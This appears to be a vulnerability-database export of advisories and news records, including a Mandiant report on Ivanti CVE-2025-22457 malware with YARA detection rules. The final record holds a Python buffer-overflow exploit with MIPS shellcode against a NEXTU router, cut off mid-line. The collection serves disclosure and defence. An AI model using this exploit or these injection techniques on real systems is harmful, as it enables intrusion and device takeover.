{
   uuid: "1140d063-7d5a-4971-8e08-9514c03dfef7",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PoC for CVE-2025-22457",
   description: "# PoC for CVE-2025-22457\n_A remote unauthenticated stack based buffer overflow affecting Ivanti Connect Secure, Pulse Connect Secure, Ivanti Policy Secure, and ZTA Gateways_\n\n## Overview\n\nThis is a proof of concept exploit to demonstrate exploitation of CVE-2025-22457. For a complete technical analysis of the vulnerability and exploitation strategy, please see our Rapid7 Analysis here: \n\nhttps://attackerkb.com/topics/0ybGQIkHzR/cve-2025-22457/rapid7-analysis\n\nAvailable at https://github.com/sfewer-r7/CVE-2025-22457",
   description_format: "markdown",
   vulnerability: "CVE-2025-22457",
   creation_timestamp: "2025-04-11T07:47:34.917635+00:00",
   timestamp: "2025-04-11T07:47:34.917635+00:00",
   related_vulnerabilities: [
      "CVE-2025-22457",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
            "vulnerability:information=PoC",
         ],
      },
   ],
}

{
   uuid: "1b563420-7047-49bc-8488-2571aa82709c",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)",
   description: "# Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) | Google Cloud Blog\nWritten by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie\n\n* * *\n\nOn Thursday, April 3, 2025, Ivanti [disclosed](https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457) a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible. \n\nThe earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported [SPAWN ecosystem of malware](https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement) attributed to UNC5221 was also observed. UNC5221 is a suspected China-nexus espionage actor that we previously observed conducting zero-day exploitation of edge devices dating back to 2023.\n\nA patch for CVE-2025-22457 was released in ICS 22.7R2.6 on February 11, 2025. The vulnerability is a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability. We assess it is likely the threat actor studied the patch for the vulnerability in ICS 22.7R2.6 and uncovered through a complicated process, it was possible to exploit 22.7R2.5 and earlier to achieve remote code execution.\n\nIvanti released [patches](https://portal.ivanti.com/) for the exploited vulnerability and Ivanti customers are urged to follow the actions in the [Security Advisory](https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457) to secure their systems as soon as possible.\n\nPost-Exploitation Tactics, Techniques, and Procedures\n-----------------------------------------------------\n\nFollowing successful exploitation, Mandiant observed the deployment of two newly identified malware families tracked as TRAILBLAZE and BRUSHFIRE through a shell script dropper. Mandiant has also observed the deployment of the [SPAWN ecosystem of malware](https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement). Additionally, similar to previously [observed](https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation/) behavior, the actor attempted to modify the Integrity Checker Tool (ICT) in an attempt to evade detection.  \n\n### Shell-script Dropper\n\nFollowing successful exploitation of CVE-2025-22457, Mandiant observed a shell script being leveraged that executes the TRAILBLAZE dropper. This dropper injects the BRUSHFIRE passive backdoor into a running `/home/bin/web` process. The first stage begins by searching for a `/home/bin/web` process that is a child process of another `/home/bin/web` process (the point of this appears to be to inject into the `web` process that is actually listening for connections). It then creates the the following files and associated content:\n\n*   `/tmp/.p`: contains the PID of the `/home/bin/web` process.\n    \n*   `/tmp/.m`: contains a memory map of that process (human-readable).\n    \n*   `/tmp/.w`: contains the base address of the `web` binary from that process\n    \n*   `/tmp/.s`: contains the base address of `libssl.so` from that process\n    \n*   `/tmp/.r`: contains the BRUSHFIRE passive backdoor\n    \n*   `/tmp/.i`: contains the TRAILBLAZE dropper\n    \n\nThe shell script then executes `/tmp/.i`, which is the second stage in-memory only dropper tracked as TRAILBLAZE. It then deletes all of the temporary files previously created (except for `/tmp/.p`), as well as the contents of the `/data/var/cores` directory. Next, all child processes of the `/home/bin/web` process are killed and the `/tmp/.p` file is deleted. All of this behavior is non-persistent, and the dropper will need to be re-executed if the system or process is rebooted.\n\n### TRAILBLAZE\n\nTRAILBLAZE is an in-memory only dropper written in bare C that uses raw syscalls and is designed to be as minimal as possible, likely to ensure it can fit within the shell script as Base64. TRAILBLAZE injects a hook into the identified `/home/bin/web` process. It will then inject the BRUSHFIRE passive backdoor into a code cave inside that process.\n\n### BRUSHFIRE\n\nBRUSHFIRE is a passive backdoor written in bare C that acts as an `SSL_read` hook. It first executes the original `SSL_read` function, and checks to see if the returned data begins with a specific string. If the data begins with the string, it will XOR decrypt then execute shellcode contained in the data. If the received shellcode returns a value, the backdoor will call `SSL_write` to send the value back.\n\n### SPAWNSLOTH\n\nAs detailed in our [previous blog post](https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement#:~:text=to%20three%20times.-,SPAWNSLOTH,-SPAWNSLOTH%20is%20a), SPAWNSLOTH acts as a log tampering component tied to the SPAWNSNAIL backdoor. It targets the `dslogserver` process to disable both local logging and remote syslog forwarding.\n\n### SPAWNSNARE\n\nSPAWNSNARE is a utility that is written in C and targets Linux. It can be used to extract the uncompressed linux kernel image (vmlinux) into a file and encrypt it using AES without the need for any command line tools.\n\n### SPAWNWAVE\n\nSPAWNWAVE is an evolved version of SPAWNANT that combines capabilities from other members of the [SPAWN](https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement#:~:text=SLIVER%20and%20CrackMapExec.-,SPAWN%20Malware%20Family,-During%20analysis%20of)\\* malware ecosystem. SPAWNWAVE overlaps with the publicly reported [SPAWNCHIMERA](https://blogs.jpcert.or.jp/en/2025/02/spawnchimera.html) and [RESURGE](https://www.cisa.gov/news-events/analysis-reports/ar25-087a) malware families.\n\nAttribution\n-----------\n\nGoogle Threat Intelligence Group (GTIG) attributes the exploitation of CVE-2025-22457 and the subsequent deployment of the SPAWN ecosystem of malware to the suspected China-nexus espionage actor UNC5221. GTIG has previously reported UNC5221 conducting zero-day exploitation of CVE-2025-0282, as well as the exploitation CVE-2023-46805 and CVE-2024-21887. \n\nFurthermore, GTIG has also previously observed UNC5221 conducting zero-day exploitation of CVE-2023-4966, impacting NetScaler ADC and NetScaler Gateway appliances. UNC5221 has targeted a wide range of countries and verticals during their operations, and has leveraged an extensive set of tooling, spanning passive backdoors to trojanized legitimate components on various edge appliances. \n\nGTIG assesses that UNC5221 will continue pursuing zero-day exploitation of edge devices based on their consistent history of success and aggressive operational tempo. Additionally, as noted in our prior blog post detailing CVE-2025-0282 exploitation, GTIG has observed UNC5221 leveraging an obfuscation network of compromised Cyberoam appliances, QNAP devices, and ASUS routers to mask their true source during intrusion operations.\n\nConclusion\n----------\n\nThis latest activity from UNC5221 underscores the ongoing sophisticated threats targeting edge devices globally. This campaign, exploiting the n-day vulnerability CVE-2025-22457, also highlights the persistent focus of actors like UNC5221 on edge devices, leveraging deep device knowledge and adding to their history of using both zero-day and now n-day flaws. This activity aligns with the broader strategy GTIG has observed among suspected China-nexus espionage groups who invest significantly in exploits and custom malware for critical edge infrastructure.\n\nRecommendations \n----------------\n\nMandiant recommends organizations immediately apply the available patch by upgrading Ivanti Connect Secure (ICS) appliances to version 22.7R2.6 or later to address CVE-2025-22457. Additionally organizations should use the external and internal Integrity Checker Tool (“ICT”) and contact Ivanti Support if suspicious activity is identified. To supplement this, defenders should actively monitor for core dumps related to the web process, investigate ICT statedump files, and conduct anomaly detection of client TLS certificates presented to the appliance.\n\nAcknowledgements\n----------------\n\nWe would like to thank Daniel Spicer and the rest of the team at Ivanti for their continued partnership and support in this investigation. Additionally, this analysis would not have been possible without the assistance from analysts across Google Threat Intelligence Group and Mandiant’s FLARE, we would like to specifically thank Christopher Gardner and Dhanesh Kizhakkinan of FLARE for their support.\n\nIndicators of Compromise\n------------------------\n\nTo assist the security community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a [GTI Collection](https://www.virustotal.com/gui/collection/c1437b752a4bece143f3584eef40b00cb72f9281068bd1c235cf76f94d744024/iocs) for registered users.\n\n\n|Code Family|MD5                             |Filename            |Description                 |\n|-----------|--------------------------------|--------------------|----------------------------|\n|TRAILBLAZE |4628a501088c31f53b5c9ddf6788e835|/tmp/.i             |In-memory dropper           |\n|BRUSHFIRE  |e5192258c27e712c7acf80303e68980b|/tmp/.r             |Passive backdoor            |\n|SPAWNSNARE |6e01ef1367ea81994578526b3bd331d6|/bin/dsmain         |Kernel extractor & encryptor|\n|SPAWNWAVE  |ce2b6a554ae46b5eb7d79ca5e7f440da|/lib/libdsupgrade.so|Implant utility             |\n|SPAWNSLOTH |10659b392e7f5b30b375b94cae4fdca0|/tmp/.liblogblock.so|Log tampering utility       |\n\n\nYARA Rules\n----------\n\n```\nrule M_APT_Installer_SPAWNANT_1\n{ \n    meta: \n        author = \"Mandiant\" \n        description = \"Detects SPAWNANT. SPAWNANT is an \nInstaller targeting Ivanti devices. Its purpose is to persistently \ninstall other malware from the SPAWN family (SPAWNSNAIL, \nSPAWNMOLE) as well as drop additional webshells on the box.\" \n  \n    strings: \n        $s1 = \"dspkginstall\" ascii fullword\n        $s2 = \"vsnprintf\" ascii fullword\n        $s3 = \"bom_files\" ascii fullword\n        $s4 = \"do-install\" ascii\n        $s5 = \"ld.so.preload\" ascii\n        $s6 = \"LD_PRELOAD\" ascii\n        $s7 = \"scanner.py\" ascii\n        \n    condition: \n        uint32(0) == 0x464c457f and 5 of ($s*)\n}\n```\n\n\n```\nrule M_Utility_SPAWNSNARE_1 {\n    meta:\n    \t author = \"Mandiant\"\n        description = \"SPAWNSNARE is a utility written in C that targets \nLinux systems by extracting the uncompressed Linux kernel image \ninto a file and encrypting it with AES.\"\n\n    strings:\n        $s1 = \"\\x00extract_vmlinux\\x00\"\n        $s2 = \"\\x00encrypt_file\\x00\"\n        $s3 = \"\\x00decrypt_file\\x00\"\n        $s4 = \"\\x00lbb_main\\x00\"\n        $s5 = \"\\x00busybox\\x00\"\n        $s6 = \"\\x00/etc/busybox.conf\\x00\"\n\n    condition:\n        uint32(0) == 0x464c457f\n        and all of them\n                  \n}\n```\n\n\n```\nrule M_APT_Utility_SPAWNSLOTH_2\n{ \n    meta: \n        author = \"Mandiant\" \n        description = \"Hunting rule to identify strings found in SPAWNSLOTH\"\n  \n    strings: \n        $dslog = \"dslogserver\" ascii fullword\n        $hook1 = \"g_do_syslog_servers_exist\" ascii fullword\n        $hook2 = \"ZN5DSLog4File3addEPKci\" ascii fullword\n        $hook3 = \"funchook\" ascii fullword\n    \n    condition: \n        uint32(0) == 0x464c457f and all of them\n}\n```\n\n\nPosted in\n\n*   [Threat Intelligence](https://cloud.google.com/blog/topics/threat-intelligence)",
   description_format: "markdown",
   vulnerability: "CVE-2025-22457",
   creation_timestamp: "2025-04-11T07:43:03.949685+00:00",
   timestamp: "2025-04-11T07:43:03.949685+00:00",
   related_vulnerabilities: [
      "CVE-2025-0282",
      "CVE-2025-22457",
      "CVE-2024-21887",
      "CVE-2023-4966",
      "CVE-2023-46805",
   ],
   meta: [
      {
         tags: [
            "vulnerability:origin=software",
         ],
      },
   ],
}

{
   uuid: "d302d303-b999-46ae-9812-71067bf20469",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Is The Sofistication In The Room With Us? - X-Forwarded-For and Ivanti Connect Secure",
   description: "- [Is The Sofistication In The Room With Us? - X-Forwarded-For and Ivanti Connect Secure](https://labs.watchtowr.com/is-the-sofistication-in-the-room-with-us-x-forwarded-for-and-ivanti-connect-secure-cve-2025-22457/)",
   description_format: "markdown",
   vulnerability: "CVE-2025-22457",
   creation_timestamp: "2025-04-07T04:02:10.205880+00:00",
   timestamp: "2025-04-07T04:02:10.205880+00:00",
   related_vulnerabilities: [
      "CVE-2025-22457",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

{
   uuid: "ee7a81f6-1013-4ce2-9180-897e57934f51",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks",
   description: "Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in \"extremely sophisticated\" attacks.\n\nThe vulnerability is tracked as CVE-2025-24201 and was found in the WebKit cross-platform web browser engine used by Apple's Safari web browser and many other apps and web browsers on macOS, iOS, Linux, and Windows.",
   description_format: "markdown",
   vulnerability: "CVE-2025-24201",
   creation_timestamp: "2025-03-12T08:35:57.565406+00:00",
   timestamp: "2025-03-12T08:35:57.565406+00:00",
   related_vulnerabilities: [
      "CVE-2025-24201",
   ],
   meta: [
      {
         ref: [
            "https://www.bleepingcomputer.com/news/apple/apple-fixes-webkit-zero-day-exploited-in-extremely-sophisticated-attacks/",
         ],
      },
   ],
}

{
   uuid: "a9f2cad3-dbfc-4703-9c5f-9af054301f88",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Apache Pinot Improper Neutralization of Special Elements Authentication Bypass Vulnerability",
   description: "CVE ID\tCVE-2024-56325\nCVSS SCORE\t9.8, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nAFFECTED VENDORS\tApache\nAFFECTED PRODUCTS\tPinot\nVULNERABILITY DETAILS\t\nThis vulnerability allows remote attackers to bypass authentication on affected installations of Apache Pinot. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the AuthenticationFilter class. The issue results from insufficient neutralization of special characters in a URI. An attacker can leverage this vulnerability to bypass authentication on the system.\n\nADDITIONAL DETAILS\t\nFixed in version 1.3.0",
   description_format: "markdown",
   vulnerability: "CVE-2024-56325",
   creation_timestamp: "2025-03-11T05:25:53.938762+00:00",
   timestamp: "2025-03-11T05:25:53.938762+00:00",
   related_vulnerabilities: [
      "CVE-2024-56325",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=remediation",
         ],
      },
   ],
}

{
   uuid: "9fd019c6-b2d5-454c-88b2-2c693681e47f",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "PolarEdge Botnet Exploits Cisco and Other Flaws to Hijack ASUS, QNAP, and Synology Devices",
   description: "French cybersecurity company Sekoia observed the unknown threat actors deploying a backdoor by leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers that could result in arbitrary command execution on susceptible devices.\n\nCVE-2023-20118 is leading to a webshell installation.",
   description_format: "markdown",
   vulnerability: "CVE-2023-20118",
   creation_timestamp: "2025-03-03T21:30:27.513197+00:00",
   timestamp: "2025-03-03T21:30:27.513197+00:00",
   related_vulnerabilities: [
      "CVE-2023-20118",
   ],
   meta: [
      {
         ref: [
            "https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/",
            "https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf",
         ],
      },
   ],
}

{
   uuid: "e2a22b2f-4064-4f7f-a7c5-6b9f4b3cd280",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Formal Vulnerability Disclosure for iPhone 15 Pro Max (iOS 18.3.1)",
   description: "### Executive Summary\n\nThis report updates the findings on CVE-2025-24085, a use-after-free vulnerability affecting Apple's IDS subsystem and iMessage's BlastDoor sandboxing.\nFindings (As of February 20, 2025)\n\n    iOS 18.3.1 remains vulnerable despite Apple's February 19, 2025, mitigation deadline.\n    BlastDoor is bypassed, enabling unsandboxed iMessage processing.\n    Privilege escalation attempts detected, suggesting a possible kernel exploit.\n    Unauthorized decryption and authentication tampering observed, raising concerns about iMessage interception and data exposure.\n\nThe exploit remains active in the wild, requiring immediate action.\n\nhttps://github.com/orgs/community/discussions/152523",
   description_format: "markdown",
   vulnerability: "CVE-2025-24085",
   creation_timestamp: "2025-02-27T08:00:55.964879+00:00",
   timestamp: "2025-02-27T08:00:55.964879+00:00",
   related_vulnerabilities: [
      "CVE-2025-24085",
   ],
   meta: [
      {
         ref: [
            "https://github.com/orgs/community/discussions/152523",
         ],
      },
   ],
}

{
   uuid: "b45703d4-11a4-4f18-a2f4-8929ea2f08d2",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "2025-02: Out-of-Cycle Security Bulletin: Session Smart Router, Session Smart Conductor, WAN Assurance Router: API Authentication Bypass Vulnerability (CVE-2025-21589)",
   description: "This issue affects Session Smart Router, Session Smart Conductor, WAN Assurance Managed Router.\nSeverity\nCritical\nSeverity Assessment (CVSS) Score\n\nCVSS: v3.1: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) SEVERITY:CRITICAL\nCVSS: v4.0: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N) SEVERITY:CRITICAL\nProblem\n\nAn Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allow a network-based attacker to bypass authentication and take administrative control of the device.\n\n \n\nThis issue affects Session Smart Router: \n\n    from 5.6.7 before 5.6.17, \n    from 6.0.8,\n    from 6.1 before 6.1.12-lts, \n    from 6.2 before 6.2.8-lts, \n    from 6.3 before 6.3.3-r2; \n\nThis issue affects Session Smart Conductor: \n\n    from 5.6.7 before 5.6.17, \n    from 6.0.8,\n    from 6.1 before 6.1.12-lts, \n    from 6.2 before 6.2.8-lts, \n    from 6.3 before 6.3.3-r2; \n\nThis issue affects WAN Assurance Managed Routers: \n\n    from 5.6.7 before 5.6.17, \n    from 6.0.8,\n    from 6.1 before 6.1.12-lts, \n    from 6.2 before 6.2.8-lts, \n    from 6.3 before 6.3.3-r2.\n\n \n\nJuniper SIRT is not aware of any malicious exploitation of this vulnerability.\nThis issue was found during internal product security testing or research\nSolution\n\nThe following software releases have been updated to resolve this issue:\n\n\nSession Smart Router: SSR-5.6.17, SSR-6.1.12-lts, SSR-6.2.8-lts, SSR-6.3.3-r2 and subsequent releases.\n\n\nIt is suggested to upgrade all affected systems to one of these versions of software. In a Conductor-managed deployment, it is sufficient to upgrade only the Conductor nodes and the fix will be applied automatically to all connected routers. As practical, the routers should still be upgraded to a fixed version however they will not be vulnerable once they connect to an upgraded Conductor. Router patching can be confirmed once the router reaches the “running\" (on 6.2 and earlier) or “synchronized” (on 6.3+) state on the Conductor\".\n \n\nThis vulnerability has been patched automatically on devices that operate with WAN Assurance (where configuration is also managed) connected to the Mist Cloud. As practical, the routers should still be upgraded to a version containing the fix.\n\nIt is important to note that when the fix is applied automatically on routers managed by a Conductor or on WAN assurance, it will have no impact on data-plane functions of the router. The application of the fix is non-disruptive to production traffic. There may be a momentary downtime (less than 30 seconds) to the web-based management and APIs. \n\n \n\nThis issue is being tracked as I95-59677.\n\nNote: Juniper SIRT's policy is not to evaluate releases which are beyond End of Engineering (EOE) or End of Life (EOL).\nWorkaround\n\nThere are no known workarounds for this issue.\nSeverity Assessment\nInformation for how Juniper Networks uses CVSS can be found at KB 16446 \"Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.\"\nModification History\n\n2024-02-11: Initial Publication\n\nRelated Information\n\n    KB16613: Overview of the Juniper Networks SIRT Quarterly Security Bulletin Publication Process\n    KB16765: In which releases are vulnerabilities fixed?\n    KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories\n    Report a Security Vulnerability - How to Contact the Juniper Networks Security Incident Response Team\n\n",
   description_format: "markdown",
   vulnerability: "ncsc-2025-0062",
   creation_timestamp: "2025-02-19T16:52:08.947558+00:00",
   timestamp: "2025-02-19T16:52:08.947558+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
         ],
      },
   ],
}

{
   uuid: "6b5acef0-e6ed-4fe9-9181-33b50f601ae5",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Palantir - Security Bulletin - CVE-2024-49581 - Palantir’s External Artifacts service (versions 105.110.1 through 105.115.0)",
   description: "Restricted Views backed objects (OSV1) could be bypassed under specific circumstances due to a software bug, this could have allowed users that didn't have permission to see such objects to view them via Object Explorer directly.  The affected service have been patched and automatically deployed to all Apollo-managed Foundry instances.",
   description_format: "markdown",
   vulnerability: "CVE-2024-49587",
   creation_timestamp: "2025-02-18T21:41:17.332565+00:00",
   timestamp: "2025-02-18T21:41:17.332565+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         ref: [
            "https://palantir.safebase.us/?tcuUid=b60db1ee-4b1a-475d-848e-c5a670a0da16",
         ],
      },
   ],
}

{
   uuid: "b2a6b85e-5b0d-4ac4-b7a4-9227e3ff28e0",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "SonicWall Firewall Vulnerability Exploited After PoC Publication",
   description: "Threat actors started exploiting a recent SonicWall firewall vulnerability this week, shortly after proof-of-concept (PoC) code targeting it was published.\n\nAccording to Bishop Fox, approximately 4,500 internet-facing SonicWall SSL VPN servers had not been patched against CVE-2024-53704 by February 7.",
   description_format: "markdown",
   vulnerability: "CVE-2024-53704",
   creation_timestamp: "2025-02-17T08:57:05.680592+00:00",
   timestamp: "2025-02-17T08:57:05.680592+00:00",
   related_vulnerabilities: [
      "CVE-2024-53704",
   ],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=documented",
            "vulnerability:information=PoC",
         ],
      },
      {
         ref: [
            "https://www.securityweek.com/sonicwall-firewall-vulnerability-exploited-after-poc-publication",
            "https://bishopfox.com/blog/sonicwall-cve-2024-53704-ssl-vpn-session-hijacking",
         ],
      },
   ],
}

{
   uuid: "83590ea9-dd4d-4b41-a332-1519809ad219",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "securityonline.info - Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291",
   description: "# Chrome Update Addresses High-Severity Vulnerability: CVE-2025-0291\n\nRef: [https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/](https://securityonline.info/chrome-update-addresses-high-severity-vulnerability-cve-2025-0291/)\n\n<img src=\"https://cdn-0.securityonline.info/wp-content/uploads/2025/01/Screenshot-2025-01-08-082901.png\" width=\"100%\" />\n\nGoogle has just released a critical security update for its Chrome web browser, addressing a high-severity vulnerability that could leave users open to attack. The update, rolling out to Windows, Mac, and Linux users over the next few days, patches a “Type Confusion” flaw in V8, the JavaScript engine that powers Chrome.\n\nThis vulnerability, tracked as CVE-2025-0291, was discovered by security researcher Popax21 and reported to Google on December 11th, 2024. Type Confusion vulnerabilities are particularly dangerous as they can allow attackers to execute malicious code on a user’s system. This can lead to a range of consequences, from data theft and system crashes to complete takeover of the affected device. Google has awarded a bounty of $55,000 to Popax21 for the discovery and responsible disclosure of the bug.\n\nType Confusion vulnerabilities occur when a program mistakenly treats data as a different type than originally intended. In the context of V8, this can lead to out-of-bounds memory access, allowing attackers to manipulate memory, crash the browser, or execute arbitrary code. Such vulnerabilities are often exploited in sophisticated attacks, making their timely resolution critical for user safety.\n\nGoogle urges all users to update their Chrome browsers to the latest version (131.0.6778.264/.265 for Windows and Mac, 131.0.6778.264 for Linux) as soon as possible. Here’s how:\n\n1.  **Open Chrome.**\n2.  **Click the three vertical dots** in the top right corner.\n3.  Go to **Help > About Google Chrome.**\n4.  Chrome will automatically **check for updates** and install the latest version.\n5.  **Relaunch Chrome** to complete the update.\n\n### Related Posts:\n\n*   [New Chrome 0-Day Bug Under Active Attack](https://securityonline.info/cve-2022-4262-chrome-0-day-vulnerability/)\n*   [New WiFi Flaw Leaves All Devices Vulnerable to ‘SSID Confusion’ Attacks](https://securityonline.info/cve-2023-52424-new-wifi-flaw-leaves-all-devices-vulnerable-to-ssid-confusion-attacks/)\n*   [Chrome will no longer flag HTTPS pages as secure sites](https://securityonline.info/chrome-will-no-longer-flag-https-pages-as-secure-sites/)",
   description_format: "markdown",
   vulnerability: "CVE-2025-0291",
   creation_timestamp: "2025-01-08T08:27:43.168816+00:00",
   timestamp: "2025-02-12T06:52:50.539121+00:00",
   related_vulnerabilities: [
      "CVE-2023-52424",
      "CVE-2022-4262",
      "CVE-2025-0291",
   ],
   meta: [
      {
         tags: [
            "vulnerability:information=annotation",
         ],
      },
   ],
}

{
   uuid: "cae05d8f-677d-4f75-9a64-811c17a16d2d",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Fortinet Clarification",
   description: "UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.\n\nFurthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.\n\nIt appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.\n\nWe have updated this previous toot, changed the title of our article, and added an update to prevent confusion.\n\nRef: https://infosec.exchange/@BleepingComputer/113986777248862223",
   description_format: "markdown",
   vulnerability: "cve-2024-55591",
   creation_timestamp: "2025-02-12T05:40:36.908353+00:00",
   timestamp: "2025-02-12T05:40:36.908353+00:00",
   related_vulnerabilities: [
      "CVE-2024-55591",
      "CVE-2025-24472",
   ],
}

{
   uuid: "c2248f9d-e2e0-4af2-a57c-e3b393cffb55",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "Clarification from Fortinet",
   description: "UPDATE: Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January, but not disclosed then.\n\nFurthermore, even though the current advisory states that the listed flaws were exploited in attacks and includes workarounds, Fortinet says that only CVE-2024-55591, and not CVE-2025-24472.\n\nIt appears that this new CVE is for a different pathway to exploiting the bug that was not previously disclosed and was just now added to the Fortinet advisory about the active exploitation of CVE-2024-55591, causing the confusion.\n\nWe have updated this previous toot, changed the title of our article, and added an update to prevent confusion.\n\nRef: https://infosec.exchange/@BleepingComputer/113986777248862223",
   description_format: "markdown",
   vulnerability: "CVE-2025-24472",
   creation_timestamp: "2025-02-12T05:40:06.836557+00:00",
   timestamp: "2025-02-12T05:40:06.836557+00:00",
   related_vulnerabilities: [
      "CVE-2024-55591",
      "CVE-2025-24472",
   ],
}

{
   uuid: "b8a5a61c-b26d-48a8-82e4-67fa23921484",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "From the vendor website:",
   description: "The M120N Advanced Industrial/In-Vehicle LTE Router is a high performance all-in-one fixed/mobile wireless communications platform with advanced software enabling high availability, reliable and secure connectivity for mission critical applications. The compact, rugged design integrates dual SIMs, four-port Gigabit Switch, Wi-Fi Access Point, embedded multi-GNSS receiver for GPS or GLONASS, and ignition sensing for in-vehicle applications. The M120N is specifically designed to support a wide range of applications in Smart Bus and M2M segments.\n\nSource: https://www.billion.com/Product/communication/M2M-Series/m120n",
   description_format: "markdown",
   vulnerability: "CVE-2025-1143",
   creation_timestamp: "2025-02-11T07:41:46.109844+00:00",
   timestamp: "2025-02-11T07:51:08.686930+00:00",
   related_vulnerabilities: [],
   meta: [
      {
         tags: [
            "vulnerability:exploitability=industrialised",
         ],
      },
   ],
}

{
   uuid: "8b27e542-2740-435c-9317-55790ef4965b",
   vulnerability_lookup_origin: "1a89b78e-f703-45f3-bb86-59eb712668bd",
   title: "NEXTU FLETA Wifi6 Router DOS, Potential RCE POC",
   description: "```python\nfrom pwn import *  \nfrom hackebds import *  \n  \n  \ndef shutdown_shell_code():  \n    context.update(arch='mips', os='linux', bits=32, endian='little')  \n  \n    cmd = \"/bin/sh\"  \n    args = [\"autoreboot\"]  \n  \n    asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit()  \n    shellcode = asm(asmcode)  \n    return shellcode  \n  \n  \npower_off_code = shutdown_shell_code()  \n  \ngap_code = (b'A') * 0x138\n\n# This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow.\n# For example I fixed address as 0x7f854710\nRET_address = (b'\\x10\\x47\\x85\\x7f')  \nstack_gap = (b'C') * 0x40  \n  \nprint(\"power_off_code_length\")  \nprint(len(power_off_code))  \n  \nfinal_code = power_off_code + gap_code + RET_address + stack_gap  \n  \nimport socket  \nimport ssl  \n  \n# Server Address and Port  \nHOST = '192.168.1.254'  \nPORT = 443  \n  \n# Create an SSL socket for HTTPS connection\ncontext = ssl.create_default_context()  \ncontext.set_ciphers('HIGH:!DH:!aNULL')  \ncontext.check_hostname = False  \ncontext.verify_mode = ssl.CERT_NONE  \n  \nwith socket.create_connection((HOST, PORT)) as sock:  \n    with context.wrap_socket(sock, server_hostname=HOST) as ssock:  \n            # Prepare the shellcode as bytes (e.g., b'\\x00\\x01\\x02'; replace with 